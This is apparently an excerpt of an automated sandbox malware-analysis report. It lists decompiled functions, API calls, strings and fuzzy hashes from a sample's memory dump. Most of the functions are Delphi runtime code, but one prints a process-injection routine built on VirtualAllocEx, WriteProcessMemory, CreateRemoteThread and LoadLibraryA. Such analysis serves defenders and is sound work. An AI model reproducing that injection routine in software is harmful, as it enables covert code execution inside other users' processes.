                                                                                                0x021727b0
                                                                                                0x0217275a
                                                                                                0x0217275a
                                                                                                0x0217275e
                                                                                                0x02172770
                                                                                                0x02172772
                                                                                                0x02172775
                                                                                                0x02172776
                                                                                                0x0217277a
                                                                                                0x0217279e
                                                                                                0x021727a0
                                                                                                0x021727a0
                                                                                                0x021727b3
                                                                                                0x021727b6
                                                                                                0x021727cd
                                                                                                0x021727b8
                                                                                                0x021727b8
                                                                                                0x021727e2
                                                                                                0x021727ba
                                                                                                0x021727ef
                                                                                                0x02172808
                                                                                                0x02172808
                                                                                                0x021727b8
                                                                                                0x0217280a
                                                                                                0x0217280d
                                                                                                0x0217280e
                                                                                                0x02172812
                                                                                                0x0217281f
                                                                                                0x0217281f
                                                                                                0x02172821
                                                                                                0x02172822
                                                                                                0x02172828
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02172828
                                                                                                0x0217282e
                                                                                                0x02172834
                                                                                                0x0217283a
                                                                                                0x02172844
                                                                                                0x0217284b
                                                                                                0x0217284b
                                                                                                0x0217284b
                                                                                                0x0217285e
                                                                                                0x021728da
                                                                                                0x021728e6
                                                                                                0x021728fe
                                                                                                0x00000000
                                                                                                0x021728fe
                                                                                                0x02172867
                                                                                                0x02172869
                                                                                                0x0217286c
                                                                                                0x0217286d
                                                                                                0x02172870
                                                                                                0x02172871
                                                                                                0x02172874
                                                                                                0x02172875
                                                                                                0x02172878
                                                                                                0x02172878
                                                                                                0x0217288a
                                                                                                0x02172892
                                                                                                0x02172895
                                                                                                0x02172897
                                                                                                0x02172898
                                                                                                0x021728a2
                                                                                                0x00000000
                                                                                                0x021728a8
                                                                                                0x021728af
                                                                                                0x021728b1
                                                                                                0x021728b4
                                                                                                0x021728b5
                                                                                                0x021728b8
                                                                                                0x021728b8
                                                                                                0x021728c2
                                                                                                0x021728cc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021728ce
                                                                                                0x021728d4
                                                                                                0x021728d7
                                                                                                0x021728d8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x021728d8
                                                                                                0x02172569
                                                                                                0x02172569
                                                                                                0x0217256f
                                                                                                0x02172570
                                                                                                0x02172571
                                                                                                0x00000000
                                                                                                0x02172573
                                                                                                0x0217258c
                                                                                                0x0217259e
                                                                                                0x021725a3
                                                                                                0x021725a5
                                                                                                0x021725ab
                                                                                                0x021725b2
                                                                                                0x00000000
                                                                                                0x021725b2

                                                                                                Strings
                                                                                                • The unexpected small block leaks are:, xrefs: 02172737
                                                                                                • bytes: , xrefs: 0217278D
                                                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02172879
                                                                                                • Unexpected Memory Leak, xrefs: 021728F0
                                                                                                • An unexpected memory leak has occurred. , xrefs: 021726C0
                                                                                                • , xrefs: 02172844
                                                                                                • 7, xrefs: 021726D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                • API String ID: 0-2723507874
                                                                                                • Opcode ID: 762de0104209bf90a51b3ef3c26c9c1784e2de2cf04f8a0605af55b7e62ab094
                                                                                                • Instruction ID: 280c05e43963657eec5c4194579ddf261893dbb90d7dac2e2d2f6e36e41987d2
                                                                                                • Opcode Fuzzy Hash: 762de0104209bf90a51b3ef3c26c9c1784e2de2cf04f8a0605af55b7e62ab094
                                                                                                • Instruction Fuzzy Hash: C071E630A842A88FDF219A2CC884BD9B6F5EB89700F2440E5DD49DB341DB758AC7CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02185BC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 55libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 52%
                                                                                                			E02185BC0(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				void* __ecx;
				void* _t22;
				void* _t27;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t40;

				_push(_t27);
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t37 = __eax;
				E02174D54(_v8);
				_push(_t40);
				_push(0x2185c73);
				_push( *[fs:eax]);
				 *[fs:eax] = _t40;
				 *0x21944dc = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				 *0x21944d4 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				 *0x21944d8 = E02185A40(_t37, 0, _t27, E02174D64(_v8), __edi, _t37);
				 *0x21944e0 = E02185B0C(_t37, 0x21944d4, E02185B8C, 0, 0xc);
				if( *0x21944e0 != 0) {
					_t22 =  *0x21944e0; // 0x0
					CloseHandle(_t22);
				}
				_pop(_t34);
				 *[fs:eax] = _t34;
				_push(E02185C7A);
				return E021748A0( &_v8);
			}










                                                                                                0x02185bc3
                                                                                                0x02185bc4
                                                                                                0x02185bc5
                                                                                                0x02185bc6
                                                                                                0x02185bc9
                                                                                                0x02185bce
                                                                                                0x02185bd5
                                                                                                0x02185bd6
                                                                                                0x02185bdb
                                                                                                0x02185bde
                                                                                                0x02185bf8
                                                                                                0x02185c12
                                                                                                0x02185c28
                                                                                                0x02185c42
                                                                                                0x02185c4e
                                                                                                0x02185c50
                                                                                                0x02185c56
                                                                                                0x02185c5b
                                                                                                0x02185c5f
                                                                                                0x02185c62
                                                                                                0x02185c65
                                                                                                0x02185c72

                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,02185C73), ref: 02185BED
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185BF3
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C07
                                                                                                • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02185C0D
                                                                                                  • Part of subcall function 02185A40: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,02185AC6,?,?,?,?,00000000,00000000,00000000), ref: 02185A80
                                                                                                  • Part of subcall function 02185A40: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,00000000,02185AC6), ref: 02185AA6
                                                                                                  • Part of subcall function 02185B0C: CreateRemoteThread.KERNEL32(?,00000000,00000000,04FA0000,04A80000,00000000,02194534), ref: 02185B58
                                                                                                  • Part of subcall function 02185B0C: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02185B68
                                                                                                  • Part of subcall function 02185B0C: ReadProcessMemory.KERNEL32(?,04A80000,?,?,02194530,00000000,000000FF), ref: 02185B7E
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02185C73), ref: 02185C56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                                                                                • String ID: LoadLibraryA$Sleep$kernel32
                                                                                                • API String ID: 3487503967-1813742806
                                                                                                • Opcode ID: b8b1990c512d809722e11607eb82028e5f6e81d581483fb401c4b099bcc0bce9
                                                                                                • Instruction ID: 23d48200aa457a9c514b10ebd021fb419accacac57552344ba2b70fdeec2fe7b
                                                                                                • Opcode Fuzzy Hash: b8b1990c512d809722e11607eb82028e5f6e81d581483fb401c4b099bcc0bce9
                                                                                                • Instruction Fuzzy Hash: BC115BB0AC0748BEE720FBA4D985A5E7BFFEB86704B924475E150AB200DB706D118F50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217BF6C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E0217BF6C(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x217c237);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0217BEA8();
				E0217AA6C(__ebx, __edi, __esi);
				_t196 =  *0x21938d0;
				if( *0x21938d0 != 0) {
					E0217AC44(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0217A9B8(_t43, 0, 0x14,  &_v20);
				E021748F4(0x2193804, _v20);
				E0217A9B8(_t43, 0x217c24c, 0x1b,  &_v24);
				 *0x2193808 = E02177DC4(0x217c24c, 0, _t196);
				E0217A9B8(_t132, 0x217c24c, 0x1c,  &_v28);
				 *0x2193809 = E02177DC4(0x217c24c, 0, _t196);
				 *0x219380a = E0217AA04(_t132, 0x2c, 0xf);
				 *0x219380b = E0217AA04(_t132, 0x2e, 0xe);
				E0217A9B8(_t132, 0x217c24c, 0x19,  &_v32);
				 *0x219380c = E02177DC4(0x217c24c, 0, _t196);
				 *0x219380d = E0217AA04(_t132, 0x2f, 0x1d);
				E0217A9B8(_t132, "m/d/yy", 0x1f,  &_v40);
				E0217ACF4(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E021748F4(0x2193810, _v36);
				E0217A9B8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0217ACF4(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E021748F4(0x2193814, _v44);
				 *0x2193818 = E0217AA04(_t132, 0x3a, 0x1e);
				E0217A9B8(_t132, 0x217c280, 0x28,  &_v52);
				E021748F4(0x219381c, _v52);
				E0217A9B8(_t132, 0x217c28c, 0x29,  &_v56);
				E021748F4(0x2193820, _v56);
				E021748A0( &_v12);
				E021748A0( &_v16);
				E0217A9B8(_t132, 0x217c24c, 0x25,  &_v60);
				_t104 = E02177DC4(0x217c24c, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E02174938( &_v8, 0x217c2a4);
				} else {
					E02174938( &_v8, 0x217c298);
				}
				E0217A9B8(_t132, 0x217c24c, 0x23,  &_v64);
				_t111 = E02177DC4(0x217c24c, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0217A9B8(_t132, 0x217c24c, 0x1005,  &_v68);
					if(E02177DC4(0x217c24c, 0, _t198) != 0) {
						E02174938( &_v12, 0x217c2c0);
					} else {
						E02174938( &_v16, 0x217c2b0);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E02174C24();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E02174C24();
				 *0x21938d2 = E0217AA04(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0217C23E);
				return E021748C4( &_v68, 0x10);
			}

























                                                                                                0x0217bf6c
                                                                                                0x0217bf6c
                                                                                                0x0217bf6d
                                                                                                0x0217bf6f
                                                                                                0x0217bf74
                                                                                                0x0217bf74
                                                                                                0x0217bf76
                                                                                                0x0217bf78
                                                                                                0x0217bf78
                                                                                                0x0217bf7b
                                                                                                0x0217bf7e
                                                                                                0x0217bf7f
                                                                                                0x0217bf84
                                                                                                0x0217bf87
                                                                                                0x0217bf8a
                                                                                                0x0217bf8f
                                                                                                0x0217bf94
                                                                                                0x0217bf9b
                                                                                                0x0217bf9d
                                                                                                0x0217bf9d
                                                                                                0x0217bfa7
                                                                                                0x0217bfb6
                                                                                                0x0217bfc3
                                                                                                0x0217bfd8
                                                                                                0x0217bfe7
                                                                                                0x0217bffc
                                                                                                0x0217c00b
                                                                                                0x0217c01e
                                                                                                0x0217c031
                                                                                                0x0217c046
                                                                                                0x0217c055
                                                                                                0x0217c068
                                                                                                0x0217c07d
                                                                                                0x0217c088
                                                                                                0x0217c095
                                                                                                0x0217c0aa
                                                                                                0x0217c0b5
                                                                                                0x0217c0c2
                                                                                                0x0217c0d5
                                                                                                0x0217c0ea
                                                                                                0x0217c0f7
                                                                                                0x0217c10c
                                                                                                0x0217c119
                                                                                                0x0217c121
                                                                                                0x0217c129
                                                                                                0x0217c13e
                                                                                                0x0217c148
                                                                                                0x0217c14d
                                                                                                0x0217c14f
                                                                                                0x0217c168
                                                                                                0x0217c151
                                                                                                0x0217c159
                                                                                                0x0217c159
                                                                                                0x0217c17d
                                                                                                0x0217c187
                                                                                                0x0217c18c
                                                                                                0x0217c18e
                                                                                                0x0217c1a0
                                                                                                0x0217c1b1
                                                                                                0x0217c1ca
                                                                                                0x0217c1b3
                                                                                                0x0217c1bb
                                                                                                0x0217c1bb
                                                                                                0x0217c1b1
                                                                                                0x0217c1cf
                                                                                                0x0217c1d2
                                                                                                0x0217c1d5
                                                                                                0x0217c1da
                                                                                                0x0217c1e7
                                                                                                0x0217c1ec
                                                                                                0x0217c1ef
                                                                                                0x0217c1f2
                                                                                                0x0217c1f7
                                                                                                0x0217c204
                                                                                                0x0217c217
                                                                                                0x0217c21e
                                                                                                0x0217c221
                                                                                                0x0217c224
                                                                                                0x0217c236

                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(00000000,0217C237,?,?,00000000,00000000), ref: 0217BFA2
                                                                                                  • Part of subcall function 0217A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0217A9D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Locale$InfoThread
                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                • API String ID: 4232894706-2493093252
                                                                                                • Opcode ID: 33131ff53440417b6627cdd2c63705541fc03b87fb7440469880bf47a6a99a8d
                                                                                                • Instruction ID: 2bbf33a53e0f14cfe0bd0cf17cc5d36d7c440846ccbe9ab3a703576bfe0f1793
                                                                                                • Opcode Fuzzy Hash: 33131ff53440417b6627cdd2c63705541fc03b87fb7440469880bf47a6a99a8d
                                                                                                • Instruction Fuzzy Hash: DD610E30BC02889FDB00EBE8D940A9FB7B7AFD9700F909576A111AB745DB34DE558B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0217E5DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E0217E5DC(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				signed short* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0217E21C(0x80070057);
				}
				_t47 =  *_t91 & 0x0000ffff;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0217CFDC();
					return E0217E21C(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 = _t91[4];
					} else {
						_v792 =  *(_t91[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0217D434();
						_t113 = _t54;
						if(_t113 == 0) {
							E0217DF74(_t100);
						}
						E0217E534(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0217E550(_v788 - 1, _t115) != 0) {
								L0217D44C();
								E0217E21C(_v792);
								L0217D44C();
								E0217E21C( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0217E580(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0217D43C();
							E0217E21C(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0217D444();
							E0217E21C(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























                                                                                                0x0217e5dc
                                                                                                0x0217e5e8
                                                                                                0x0217e5ee
                                                                                                0x0217e5f0
                                                                                                0x0217e5fa
                                                                                                0x0217e601
                                                                                                0x0217e601
                                                                                                0x0217e606
                                                                                                0x0217e614
                                                                                                0x0217e78d
                                                                                                0x0217e794
                                                                                                0x0217e795
                                                                                                0x00000000
                                                                                                0x0217e61a
                                                                                                0x0217e61d
                                                                                                0x0217e62f
                                                                                                0x0217e61f
                                                                                                0x0217e624
                                                                                                0x0217e624
                                                                                                0x0217e63e
                                                                                                0x0217e64a
                                                                                                0x0217e64d
                                                                                                0x0217e6ba
                                                                                                0x0217e6c0
                                                                                                0x0217e6c1
                                                                                                0x0217e6c7
                                                                                                0x0217e6c8
                                                                                                0x0217e6ca
                                                                                                0x0217e6cf
                                                                                                0x0217e6d3
                                                                                                0x0217e6d5
                                                                                                0x0217e6d5
                                                                                                0x0217e6e0
                                                                                                0x0217e6eb
                                                                                                0x0217e6f6
                                                                                                0x0217e6ff
                                                                                                0x0217e702
                                                                                                0x0217e71e
                                                                                                0x0217e725
                                                                                                0x0217e730
                                                                                                0x0217e747
                                                                                                0x0217e74c
                                                                                                0x0217e760
                                                                                                0x0217e765
                                                                                                0x0217e778
                                                                                                0x0217e778
                                                                                                0x0217e781
                                                                                                0x0217e704
                                                                                                0x0217e704
                                                                                                0x0217e705
                                                                                                0x0217e70b
                                                                                                0x0217e711
                                                                                                0x0217e713
                                                                                                0x0217e715
                                                                                                0x0217e718
                                                                                                0x0217e71b
                                                                                                0x0217e71b
                                                                                                0x0217e71e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217e71e
                                                                                                0x0217e64f
                                                                                                0x0217e64f
                                                                                                0x0217e650
                                                                                                0x0217e652
                                                                                                0x0217e658
                                                                                                0x0217e65a
                                                                                                0x0217e669
                                                                                                0x0217e66a
                                                                                                0x0217e674
                                                                                                0x0217e675
                                                                                                0x0217e67a
                                                                                                0x0217e685
                                                                                                0x0217e686
                                                                                                0x0217e690
                                                                                                0x0217e691
                                                                                                0x0217e696
                                                                                                0x0217e6b1
                                                                                                0x0217e6b3
                                                                                                0x0217e6b4
                                                                                                0x0217e6b7
                                                                                                0x0217e6b7
                                                                                                0x00000000
                                                                                                0x0217e658
                                                                                                0x0217e64d

                                                                                                APIs
                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0217E675
                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0217E691
                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0217E6CA
                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0217E747
                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0217E760
                                                                                                • VariantCopy.OLEAUT32(?), ref: 0217E795
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                • String ID:
                                                                                                • API String ID: 351091851-3916222277
                                                                                                • Opcode ID: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                                                • Instruction ID: 5ee6f9574b613ecfb75ac3448ea7e47deeedfef247eeb41632f8dff0113d2b1a
                                                                                                • Opcode Fuzzy Hash: d94f510cd20c3572f14f1eea84ef244383f3df022967f07e0074afa02e153631
                                                                                                • Instruction Fuzzy Hash: 4B51C77598062D9FCB26DB58C880BD9B3FDAF88304F4441E5E609E7211DB70AF858FA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02174720 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 79%
                                                                                                			E02174720(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x2191044 == 0) {
					if( *0x2190030 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x2191218 == 0xd7b2 &&  *0x2191220 > 0) {
						 *0x2191230();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E021747A8, 2,  &_v4, 0);
				}
			}





                                                                                                0x02174728
                                                                                                0x02174788
                                                                                                0x02174798
                                                                                                0x02174798
                                                                                                0x0217479e
                                                                                                0x0217472a
                                                                                                0x02174733
                                                                                                0x02174743
                                                                                                0x02174743
                                                                                                0x0217475f
                                                                                                0x02174780
                                                                                                0x02174780

                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?,021937C0,?,?,021907CC,021767FD,0218F2B5), ref: 02174759
                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?,021937C0,?,?,021907CC,021767FD,0218F2B5), ref: 0217475F
                                                                                                • GetStdHandle.KERNEL32(000000F5,021747A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?,021937C0), ref: 02174774
                                                                                                • WriteFile.KERNEL32(00000000,000000F5,021747A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,021747E7,?,?), ref: 0217477A
                                                                                                • MessageBoxA.USER32 ref: 02174798
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHandleWrite$Message
                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                • API String ID: 1570097196-2970929446
                                                                                                • Opcode ID: b6068a841df7d51e292d7f601f2ff33c9e8abc579706f4a6bf48621c239bc268
                                                                                                • Instruction ID: 06a8df8170a065832022353ee7f1847046986ac8da2c1b821dc5a67f05909f52
                                                                                                • Opcode Fuzzy Hash: b6068a841df7d51e292d7f601f2ff33c9e8abc579706f4a6bf48621c239bc268
                                                                                                • Instruction Fuzzy Hash: 13F0BB71AC03453CFB10B2749D86F5A23BC57C6F61F644B09F55CE90C0C7B050C08A25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02172EC8 Relevance: 11.4, APIs: 9, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E02172EC8(CHAR* __eax, void* __ecx, intOrPtr* __edx) {
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t29;
				CHAR* _t30;
				CHAR* _t31;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t36;
				CHAR** _t37;

				_t33 = __edx;
				_t23 = __eax;
				L2:
				while(1) {
					if( *_t23 != 0 &&  *_t23 <= 0x20) {
						_t23 = CharNextA(_t23);
						continue;
					}
					if( *_t23 != 0x22 || _t23[1] != 0x22) {
						_t35 = 0;
						 *_t37 = _t23;
						while( *_t23 > 0x20) {
							if( *_t23 != 0x22) {
								_t29 = CharNextA(_t23);
								_t35 = _t35 + _t29 - _t23;
								_t23 = _t29;
								continue;
							}
							_t23 = CharNextA(_t23);
							while( *_t23 != 0 &&  *_t23 != 0x22) {
								_t32 = CharNextA(_t23);
								_t35 = _t35 + _t32 - _t23;
								_t23 = _t32;
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						E02174F90(_t33, _t35);
						_t24 =  *_t37;
						_t36 =  *_t33;
						_t34 = 0;
						while( *_t24 > 0x20) {
							if( *_t24 != 0x22) {
								_t30 = CharNextA(_t24);
								if(_t30 <= _t24) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t30 > _t24);
								continue;
							}
							_t24 = CharNextA(_t24);
							while( *_t24 != 0 &&  *_t24 != 0x22) {
								_t31 = CharNextA(_t24);
								if(_t31 <= _t24) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t36 + _t34)) =  *_t24 & 0x000000ff;
									_t24 =  &(_t24[1]);
									_t34 = _t34 + 1;
								} while (_t31 > _t24);
							}
							if( *_t24 != 0) {
								_t24 = CharNextA(_t24);
							}
						}
						return _t24;
					} else {
						_t23 =  &(_t23[2]);
						continue;
					}
				}
			}














                                                                                                0x02172ecd
                                                                                                0x02172ecf
                                                                                                0x00000000
                                                                                                0x02172edb
                                                                                                0x02172ede
                                                                                                0x02172ed9
                                                                                                0x00000000
                                                                                                0x02172ed9
                                                                                                0x02172ee8
                                                                                                0x02172ef5
                                                                                                0x02172ef7
                                                                                                0x02172f44
                                                                                                0x02172eff
                                                                                                0x02172f3a
                                                                                                0x02172f40
                                                                                                0x02172f42
                                                                                                0x00000000
                                                                                                0x02172f42
                                                                                                0x02172f07
                                                                                                0x02172f1b
                                                                                                0x02172f11
                                                                                                0x02172f17
                                                                                                0x02172f19
                                                                                                0x02172f19
                                                                                                0x02172f28
                                                                                                0x02172f30
                                                                                                0x02172f30
                                                                                                0x02172f28
                                                                                                0x02172f4d
                                                                                                0x02172f52
                                                                                                0x02172f55
                                                                                                0x02172f57
                                                                                                0x02172fb5
                                                                                                0x02172f5e
                                                                                                0x02172fa2
                                                                                                0x02172fa6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02172fa8
                                                                                                0x02172fa8
                                                                                                0x02172fab
                                                                                                0x02172faf
                                                                                                0x02172fb0
                                                                                                0x02172fb1
                                                                                                0x00000000
                                                                                                0x02172fa8
                                                                                                0x02172f66
                                                                                                0x02172f83
                                                                                                0x02172f70
                                                                                                0x02172f74
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02172f76
                                                                                                0x02172f76
                                                                                                0x02172f79
